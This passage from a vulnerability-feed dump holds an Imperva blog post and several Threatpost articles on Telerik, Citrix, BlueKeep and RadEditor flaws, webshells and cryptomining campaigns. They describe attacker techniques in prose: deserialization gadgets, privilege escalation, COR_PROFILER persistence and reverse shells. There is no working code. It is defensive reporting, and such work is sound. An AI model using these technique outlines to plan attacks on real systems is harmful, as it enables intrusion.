file uploads to anywhere in the file system the web server has write permissions to.\n\nThe more recent vulnerability, CVE-2019-18935, details the anatomy of the upload request from RadAsyncUpload, in which the rauPostData parameter contains both a serialized configuration object, and the object\u2019s type.\n\nShown below is the HTTP POST request containing the encrypted rauPostData parameter. The part of the parameter before the \u201c&\u201d, highlighted in blue is the serialized configuration object, and the part after, highlighted in yellow is the object's defined type.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/Telerik-Request.jpg>)\n\nWhen decrypted the configuration object resembles the following:\n \n \n {\n \"TargetFolder\":\"jgas0meSrU/uP/TPzrhDTw==Au0LOaX6ddHOqJL5T8IwoKpc0rwIVPUB/dtjhNpis+s=\",\n \"TempTargetFolder\":\"5wWbvXpnoGw9mTa6QfX46Myim0SoKqJw/9EHc5hWUV4=fkWs4vRRUA8PKwu+jP0J2GwFcymt637TiHk3kmHvRM4=\",\n \"MaxFileSize\":0,\n \"TimeToLive\":{\n \"Ticks\":1440000000000,\n \"Days\":0,\n \"Hours\":40,\n \"Minutes\":0,\n \"Seconds\":0,\n \"Milliseconds\":0,\n \"TotalDays\":1.6666666666666665,\n \"TotalHours\":40,\n \"TotalMinutes\":2400,\n \"TotalSeconds\":144000,\n \"TotalMilliseconds\":144000000\n },\n \"UseApplicationPoolImpersonation\":false\n }\n \n\nAnd the type resembles:\n\n` \nTelerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=2017.1.228, Culture=neutral, PublicKeyToken=121fae78165ba3d4 \n`\n\nIt was discovered that, if the attacker could modify the specified type to be a gadget - a class inside the scope of execution of the application - in a subsequent request, they could achieve remote code execution on the server.\n\nAnalysts at Imperva were able to take the proof of concept code provided, and reproduce the requests made. From here they were able to create cloud WAF rules to distinguish between legitimate traffic from the RadAsyncUpload file handler, and the malicious requests from the PoC code.\n\n**Statistics and observations:**\n\nThroughout June, we observed the attack pattern matching that of an exploit of CVE-2019-18935 on 645 occasions. The following chart shows the top targeted countries during that period.\n\n### Exploitation of Citrix Products CVE-2019-19781\n\nThe vulnerability in Citrix products CVE-2019-19781 was disclosed in a bulletin released by Citrix back in December 2019. Although no proof of concept or exploit was released at the time, it was said to potentially result in remote code execution and was presumed to take advantage of a directory traversal flaw in the application. We\u2019ve already released a blog post covering our mitigation of this vulnerability [here](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>).\n\n**Statistics and observations:**\n\nDuring the month of June we\u2019ve seen the rule put in place for this vulnerability by Imperva Cloud WAF triggered 155,050 times. The following chart shows the top targeted countries during that period.\n\n### Persistence Techniques\n\nThe ACSC identified several different persistence techniques used during the campaign. Among these were several webshells which allowed the attacker to interact with the compromised systems after achieving initial access.\n\nA webshell is a script or piece of code which runs on a web server and allows for administrative actions to be performed remotely. Often these serve legitimate purposes, although uploading of webshells is common practice for attackers seeking to maintain persistence after initially compromising a server. These webshells are commonly referred to as backdoors.\n\n**Imperva\u2019s backdoor protection**\n\nBackdoor protection, which forms a part of the Imperva Cloud WAF, is capable of both detection and mitigation of webshells uploaded to compromised servers to act as backdoors. When certain conditions are met, the Cloud WAF proxies inspect the response from the server, from which they can identify known webshells, and block the subsequent requests thereafter.\n\nYou can read more about Imperva\u2019s backdoor protection [here](<https://www.imperva.com/blog/the-trickster-hackers-backdoor-obfuscation-and-evasion-techniques/>)\n\n**Webshells observed in the campaign**\n\nIn its disclosure, the ACSC provided a [list of webshells](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises-Web-Shell-Source.txt>) observed during the attack campaign. In each instance, the source code for the webshell was provided, XOR\u2019d, and base64 encoded to prevent \u2018accidental mishandling\u2019 of the code. We\u2019ll look briefly at two of these webshells and outline how Imperva\u2019s Backdoor Protection effectively mitigates them. Shown below is the Awen webshell source code in its encoded form.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image6.png>)\n\n### Awen asp.net webshell\n\nThis is a simple, open source asp.net webshell outlined by the ACSC in its disclosure. It creates a simple HTML form which receives a string as input, and provides it as an argument to cmdexe. Shown below is the Awen webshell running in our sandbox environment, after executing the \u201csysteminfo\u201d command.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image1-1.png>)\n\nAnalysts at Imperva were then able to decode the source code of both the webshells discussed, execute that code on a sandbox environment, and gather enough info to craft signatures to detect the webshells in the wild. Although neither of these webshells have been observed in the wild by Imperva at this time, we will be monitoring the traffic detected by these signatures closely in the coming weeks.\n\nFrom even a brief look at the details provided about the recent Australian Cyber attack, a lot can be learned about the techniques used by threat actors, and many conclusions can be drawn. Among the most significant is that even advanced \u201cstate based\u201d actors will make use of readily available exploits and attack code. Although the [mitigation recommendations from the ACSC](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks>) are well advised, the use of a well configured WAF can serve as an extra layer of protection. This is where the deployment of the Imperva WAF could make all the difference to your business.\n\nThe post [Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF](<https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-06T15:01:00", "type": "impervablog", "title": "Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2019-19781"], "modified": "2020-07-06T15:01:00", "id": "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "href": "https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:04", "bulletinFamily": "info", "cvelist": ["CVE-2014-4958"], "description": "All versions of an HTML editor used in several Microsoft technologies, including ASP.NET, suffer from a high-risk cross-site scripting (XSS) vulnerability that could allow an attacker to inject malicious script and glean private information.\n\nThe problem exists in all versions of RadEditor, a WYSIWYG text editor manufactured by Bulgaria-based firm Telerik, according to security researcher G.S. McNamara, who disclosed the vulnerability on [his blog late last week](<http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/>).\n\n\u201cTechnically speaking, this is a massive hole in how existing input validation security filters work in unison,\u201d McNamara said in an email Thursday to Threatpost regarding the vulnerability.\n\nThe editor, which allows users to input rich-text, is used to varying degrees in Microsoft products like [MSDN, CodePlex, TechNet, and MCMS, along with some Sharepoint and ASP.NET implementations](<http://demos.telerik.com/aspnet-ajax/editor/examples/overview/defaultcs.aspx>).\n\n\u201cIt\u2019s a silent killer, too, because at least one commercial penetration-testing tool failed to find it\u201d McNamara said, \u201cYou just get a false negative.\u201d\n\nMcNamara initially found the vulnerability (CVE-2014-4958) in a 2009 version (2009.3.1208.20) of the product on Internet Explorer along with a 2014 version but suggests it could have existed in previous iterations of the editor.\n\n\u201cI just had a hunch and followed it obsessively, manually,\u201d McNamara said of his search for the bug, which he first dug up on July 9.\n\nFrom there it took about two months of going back and forth with the company.\n\nWhen he first contacted Telerik\u2019s Customer Support department, it insisted the bug had already been fixed. To prove his case McNamara forwarded the company his exploit code. When Telerik still wouldn\u2019t put him in touch with anyone in charge of security, McNamara ultimately had to go through what he calls \u201cunofficial channels,\u201d by sending a personal email to a Telerik employee\u2019s Gmail account in late August, to finally get the ball rolling.\n\nIt wasn\u2019t until earlier this month that the researcher and the company agreed to coordinate a disclosure. Yet after two weeks of radio silence from Telerik \u2013 McNamara claims he made multiple phone calls, emails, requests to high-level account managers \u2013 he decided to disclose the bug independently \u2014 only to have the company release its information \u201cout of the blue,\u201d hours before he was planning on releasing his, last Wednesday.\n\n\u201cResolving this politely was tough,\u201d McNamara admits, claiming the issue lasted as long as it did due to a lapse in responsibility.\n\n\u201cThis is a technical product sold to technical developers, and Telerik wanted the developers to share the responsibility of security. The developers probably didn\u2019t know that,\u201d McNamara said.\n\nWhile RadEditor\u2019s filters cover some attack vectors \u2013 namely the RemoveScripts filter to strip out script tags \u2013 the attack technique that McNamara used \u201cis not your typical XSS.\u201d\n\n\u201cBy using lesser-known attacks I found a way through,\u201d McNamara said, adding that he put to use some old research by WhiteHat Security\u2019s Jeremiah Grossman to help dig up the vulnerability.\n\nSpecifically the vulnerability employs attribute-based cross-site scripting without relying on JavaScript tags. It\u2019s also harder to detect because the web editor has to process many different obfuscated elements, notably dynamic properties like CSS Expressions, used in older builds of IE, in addition to JavaScript.\n\nIn a blog entry Telerik [posted on Wednesday](<http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks>) the company addressed the issue and gave credit to McNamara but stood pat on its stance that the responsibility of sanitizing content to prevent threats should fall to the developer.\n\n\u201cIt is always the duty of the developer to implement the necessary content validation,\u201d Nikodim Lazarov, one of the company\u2019s senior software developers wrote.\n\nThe company is slated to push out a patch for the issue but not until it updates the Q3 edition of its controls, in late October. In the meantime Telerik is [giving users a workaround](<http://feedback.telerik.com/Project/108/Feedback/Details/137364-prevent-possible-xss-attack-in-radeditor-using-malicious-content-in-ie>) that it\u2019s strongly recommending users follow until its patch is pushed.\n\nMcNamara, who works as an application security engineer at the IT services provider CGI, says that he\u2019s planning to do further research in his spare time on other rich text editors like RadEditor to see if he can find similar problems.\n\n\u201cMost of the company\u2019s user base is likely unaware that they silently integrated a high-risk vulnerability into their site,\u201d McNamara says of bug in closing, \u201cSystem owners signed off on this without knowing.\u201d\n", "modified": "2014-10-01T19:22:03", "published": "2014-09-29T12:15:03", "id": "THREATPOST:DDF98CD337434196370FDCA7D39C0ED0", "href": "https://threatpost.com/radeditor-web-editor-vulnerable-to-xss-attacks/108594/", "type": "threatpost", "title": "Web Editor Vulnerable To XSS Attacks", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-05-07T21:56:19", "description": "An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology. It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine \u2013 a unique approach, according to researchers.\n\nVirtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking trojanized packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.\n\nUpon downloading, an unwitting audiophile\u2019s computer would be infVirtual Studio Technology (VST)ected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three Mac versions and one Windows variant of the malware have been uncovered.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,\u201d wrote Michal Malik, researcher at ESET, [in a posting](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>) on Thursday. \u201cThus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.\u201d\n\nBecause the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.\n\n\u201cThese applications are usually complex, so it is not unexpected for them to be huge files,\u201d Malik explained. \u201cThe attackers use this to their advantage to camouflage their virtual machine (VM) images.\u201d\n\nDespite the efforts at camouflage, victims quickly become aware that something\u2019s amiss, thanks to system slowdowns, according to [forum postings](<https://discussions.apple.com/thread/8602989>).\n\n\u201cUnfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,\u201d said a user named \u201cMacloni.\u201d\n\n\u201cThe same user attached screenshots of the Activity Monitor indicating 2 processes \u2013 qemu-system-x86_64 and tools-service \u2013 taking 25 percent of CPU resources and running as root,\u201d said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.\n\n## Using a Virtual Machine\n\nLoudMiner uses QEMU on macOS and VirtualBox on Windows to connect to a Linux image running on a VM \u2013 more specifically, it\u2019s a Tiny Core Linux 9.0 image configured to run XMRig. The victim\u2019s machine is added to a mining pool that the Linux image uses for CPU power.\n\nMalik noted that that the decision by the malware authors to use VMs for performing the mining instead of hosting it locally on the victim\u2019s computer is \u201cquite remarkable and this is not something we routinely see\u201d \u2013 although it\u2019s not unheard of for legitimate miners to [deploy the strategy](<https://medium.com/@Jayvdb/how-to-start-mining-cryptocurrency-for-fun-and-possibly-profit-71517859ed91>) to save money.\n\n\u201cUser downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,\u201d he explained. \u201cLoudMiner hides itself and becomes persistent on reboot. The Linux virtual machine is launched and [the mining starts](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>). Scripts inside the virtual machine can contact the C2 server to update the miner.\u201d\n\nHe said that in order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the \u201cidgenerator\u201d script and its output is sent to the C2 server by the \u201cupdater.sh script.\u201d\n\nBecause LoudMiner uses a mining pool, it\u2019s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.\n\nTo avoid the threat, age-old advice applies: Don\u2019t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, \u201cadditional\u201d installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).\n", "cvss3": {}, "published": "2019-06-20T19:53:23", "type": "threatpost", "title": "LoudMiner Cryptominer Uses Linux Image and Virtual Machines", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-06-20T19:53:23", "id": "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "href": "https://threatpost.com/loudminer-cryptominer-linux/145871/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:25:29", "description": "A Monero cryptocurrency-mining campaign has emerged that exploits a known vulnerability in public-facing web applications built on the ASP.NET open-source web framework.\n\nThe campaign has been dubbed Blue Mockingbird by the analysts at Red Canary that discovered the activity. Research uncovered that the cybercriminal gang is exploiting a deserialization vulnerability, [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>), which can allow remote code execution. The bug is found in the Progress Telerik UI front-end offering for ASP.NET AJAX.\n\nAJAX stands for Asynchronous JavaScript and XML; It\u2019s used to add script to a webpage which is executed and processed by the browser. Progress Telerik UI is an overlay for controlling it on ASP.NET implementations.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability lies specifically in the RadAsyncUpload function, according to the writeup on the bug in the National Vulnerability Database. This is exploitable when the encryption keys are known (via another exploit or other attack), meaning that any campaign relies on a chaining of exploits.\n\nIn the current attacks, Blue Mockingbird attackers are uncovering unpatched versions of Telerik UI for ASP.NET, deploying the [XMRig Monero-mining payload](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) in dynamic-link library (DLL) form on Windows systems, then executing it and establishing persistence using multiple techniques. From there, the infection propagates laterally through the network.\n\nThe activity appears to stretch back to December, according to the analysis, and continued through April at least.\n\nXMRig is open-source and can be compiled into custom tooling, according to the analysis. Red Canary has observed three distinct execution paths: Execution with rundll32.exe explicitly calling the DLL export fackaaxv; execution using regsvr32.exe using the /s command-line option; and execution with the payload configured as a Windows Service DLL.\n\n\u201cEach payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address,\u201d explained researchers at Red Canary, in a [Thursday writeup](<https://redcanary.com/blog/blue-mockingbird-cryptominer/>). \u201cSo far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success.\u201d\n\nTo establish persistence, Blue Mockingbird actors must first elevate their privileges, which they do using various techniques; for instance, researchers observed them using a JuicyPotato exploit to escalate privileges from an IIS Application Pool Identity virtual account to the NT Authority\\SYSTEM account. In another instance, the Mimikatz tool (the official signed version) was used to access credentials for logon.\n\nArmed with the proper privileges, Blue Mockingbird leveraged multiple persistence techniques, including the use of a COR_PROFILER COM hijack to execute a malicious DLL and restore items removed by defenders, according to Red Canary.\n\n\u201cTo use COR_PROFILER, they used wmic.exe and Windows Registry modifications to set environment variables and specify a DLL payload,\u201d the writeup explained.\n\nBlue Mockingbird likes to move laterally to distribute mining payloads across an enterprise, added researchers. The attackers do this by using their elevated privileges and Remote Desktop Protocol (RDP) to access privileged systems, and then Windows Explorer to then distribute payloads to remote systems.\n\nAlthough Blue Mockingbird has been making noticeable waves, the toolkit is a work in progress.\n\n\u201cIn at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies for pivoting,\u201d said the researchers. \u201cThese tools included a fast reverse proxy (FRP), Secure Socket Funneling (SSF) and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form.\u201d\n\nIn terms of preventing the threat, patching web servers, web applications and dependencies of the applications to inhibit initial access is the best bet, according to Red Canary.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-07T21:01:37", "type": "threatpost", "title": "Blue Mockingbird Monero-Mining Campaign Exploits Web Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935", "CVE-2020-5135"], "modified": "2020-05-07T21:01:37", "id": "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "href": "https://threatpost.com/blue-mockingbird-monero-mining/155581/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T21:57:53", "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. \u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)The BlueKeep vulnerability (CVE-2019-0708) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. \u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. And, the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2014 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we cant deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). \u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "cvss3": {}, "published": "2019-06-05T14:14:47", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2019-18935"], "modified": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-13T11:25:12", "description": "In less time than it takes to get a stuffed crust pizza delivered, a new group called SnapMC can breach an organization\u2019s systems, steal their sensitive data, and demand payment to keep it from being published, according to a new [report from NCC Group\u2019s threat intelligence team](<https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/>) \u2014 no ransomware required.\n\nRather than disrupting business operations by locking down a target\u2019s data and systems, SnapMC just focuses on straight-up extortion. However, this low-tech, ransomware-free approach to extortion on a compressed timeline relies on known vulnerabilities with patches readily available.\n\n\u201cIn the extortion emails we have seen from SnapMC have given victims 24 hours to get in contact and 72 hours to negotiate,\u201d the report said. \u201cThese deadlines are rarely abided by, since we have seen the attacker to start increasing the pressure well before countdown hits zero.\u201d\n\nThe researchers weren\u2019t able to link the group to any known threat actors and gave it the name for it\u2019s speed (\u201cSnap\u201d) and its mc.exe exfiltration tool of choice.\n\nAs evidence the group has the data, SnapMC provides victims with a list of the exfiltrated data. If they fail to engage in negotiations within the timeframe, the attackers threaten to publish the data and report the breach to customers and the media.\n\nAnalysts said they\u2019ve observed SnapMC successfully breaching unpatched and vulnerable VPNs using the [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) remote code execution bug in Telerik UI for ASPX.NET, and webserver apps using SQL injections.\n\n## **VPN Vulnerabilities **\n\nA recent rise in VPN vulnerabilities has left companies exposed, according to Hank Schless, a senior manager with Lookout cloud security.\n\n\u201cWhile VPN solutions have their place, there have been multiple stories of vulnerabilities within these solutions that were exploited in the wild,\u201d Schless explained to Threatpost. \u201cEnsuring that only authorized and secure users or devices can access corporate infrastructure requires zero trust network access (ZTNA) policies for on-premise or private apps and cloud access security broker (CASB) capabilities for cloud-based apps and infrastructure.\u201d\n\nLast June the Colonial Pipeline was breached with an [old VPN password](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>). And last July [SonicWall issued a patch](<https://threatpost.com/sonicwall-vpn-bugs-attack/167824/>) for a bug in its old VPN models no longer supported by the company after attacks came to light \u2014 which were part of an ongoing wider campaign to exploit ([CVE-2019-7418](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-7481>)).\n\nThe following month, [Cisco Systems issued a handful of patches](<https://threatpost.com/critical-cisco-bug-vpn-routers/168449/>) for the 8,800 Gigabit VPN routers vulnerable to compromise through [CVE-2021-1609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1609>).\n\nAnd by late last month, the National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CSIA) issued guidance to the Department of Defense, National Security Systems and the Defense Industrial Base to [harden their VPNs](<https://threatpost.com/vpns-nsa-cisa-guidance/175150/>) against threats from multiple nation-state advanced persistent threat (APT) actors.\n\nNation-state actors aside, basic patching would protect against this latest smash-and-grab attempt at data extortion from the likes of SnapMC.\n\n## **Ransomware\u2019s Evolution **\n\nOliver Tavakoli, CTO with Vectra, said that getting rid of the encryption piece of the attack altogether is a \u201cnatural evolution\u201d of the ransomware [business model](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>). The NCC team likewise predicts the trend toward simple attacks on shorter timelines is likely to continue.\n\n\u201cNCC Group\u2019s Threat Intelligence team predicts that data-breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack,\u201d the team said. \u201cTherefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online **_](<https://threatpost.com/category/webinars/>)_**_town halls_**__** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-13T11:22:00", "type": "threatpost", "title": "30 Mins or Less: Rapid Attacks Extort Orgs Without Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2019-7418", "CVE-2021-1609"], "modified": "2021-10-13T11:22:00", "id": "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", "href": "https://threatpost.com/rapid-attacks-extort-ransomware/175445/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:58:06", "description": "A high-severity bug has been found that allows remote attackers to hijack Cisco\u2019s enterprise-class Industrial Network Director. The vulnerability was made 